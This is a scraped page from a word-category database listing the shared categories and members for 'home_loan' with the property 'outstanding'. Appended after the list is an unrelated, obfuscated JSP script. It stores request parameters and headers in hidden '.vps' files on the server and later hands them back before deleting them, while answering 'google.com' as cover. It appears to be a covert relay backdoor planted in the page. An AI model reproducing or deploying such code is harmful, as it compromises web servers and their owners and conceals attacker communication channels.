Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
home_loan
with nuance
outstanding
:
outstanding:debt,
Simple categories matching
outstanding
:
property,
debt,
security,
account,
charge,
quality,
loan,
performance,
issue,
bill,
accomplishment,
liabilities,
expense,
feature,
characteristic,
trait,
attribute,
liability,
Members with property
outstanding
:
loan,
high_stiffness,
high_hardness,
salt_stability,
superior_fluidity,
excellent_gloss,
hardness,
outstanding_tax,
intellectual-property_right,
abrasive_resistance,
student_loan,
interest,
durability,
less_consumption,
high_strength,
heat_resistance,
low_power,
resistance,
claim,
toughness,
treasury_security,
light_weight,
high_rigidity,
course_payment,
bill,
personal_loan,
benefit,
optical_clarity,
unique_luster,
nuclease_resistance,
miniaturization,
corrosion,
superior_strength,
thermal_stability,
chemical_resistance,
chemical_stability,
high_efficiency,
vat,
dimension,
late_fee,
low_density,
environmental_resistance,
social_status,
great_strength,
mineral_wealth,
strength,
cyprus_issue,
light_fastness,
unfinished_project,
marble_column,
faster_response,
credit_history,
humidity,
excellent_softness,
high_portability,
luster,
chemical_inertness,
credit-card_debt,
gloss,
child,
budget,
surface_hardness,
maintenance_debt,
color_tone,
uniformity,
loyalty,
delinquent_return,
low_cost,
good_corrosion,
thermal_transport,
high-temperature_stability,
wages,
founding,
special_initiative,
high_flexibility,
superior_elasticity,
tensile_property,
cold_resistance,
elongation,
mechanical_property,
surface_accuracy,
optimal_colouring,
elastic_property,
weather_resistance,
revolving-credit_loan,
military_skill,
large_surface,
resilience,
specific_heat,
tax,
incomplete_return,
showy_fall,
uv_resistance,
stiffness,
rent,
personality,
hydrophobicity,
legal_base,
compression_set,
housing_loan,
surface,
low_weight,
fruit_quality,
flow,
right,
extreme,
shining_whiteness,
erosion,
unmatched_clarity,
elasticity,
rigidity,
tension,
high_stability,
rose_tattoo,
student_debt,
property,
fire_resistance,
transparency,
cleaning_charge,
energy_saving,
great_flexibility,
municipal_tax,
quality,
warrant,
talent,
thickness_accuracy,
legal_aspect,
medical_bill,
quicker_response,
college_fee,
surface_gloss,
abrasion,
texture,
color,
abrasion_resistance,
convenience,
vibrant_color,
high_transparency,
equipment_payment,
mortgage_arrears,
fine,
good_resilience,
nature,
line,
thermal_resistance,
moisture_resistance,
arrears,
outstanding_interest,
car_loan,
home_loan,
late_charge,
energy_absorption,
final_fee,
versatility,
utility_bill,
high_resilience,
wireless_web,
heat_stability,
tear_strength,
medical_debt,
good_flow,
higher_sensitivity,
heat,
mechanical_strength,
low_adhesion,
tuition,
community_charge,
closure,
scratch,
clarity,
specific_claim,
mandatory_fee,
demurrage,
back_tax,
corrosion_resistance,
aspect,
electrical_property,
anti_incision,
flame_resistance,
adhesion,
pension_right,
comfortable_hand,
malpractice-insurance_fee,
colourlessness,
superior_quality,
pure_color,
scholastic_achievement,
health,
stability,
exceptional_strength,
dimensional_stability,
physical_beauty,
flexibility,
tensile_strength,
molding_stability,
impact_resistance,
excellent_corrosion,
debt,
impact_strength,
utility_charge,
unpaid_debt,
group_goal,
thermodynamic_stability,
excellent_adhesion,
extreme_hardness,
exceptional_clarity,
rent_arrears,
mortgage,
shape_stability,
programme,
distinctness,
beauty,
high_forehead,
error_tolerance,
penalty,
low_viscosity,
consciousness,
land_claim,
friction,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>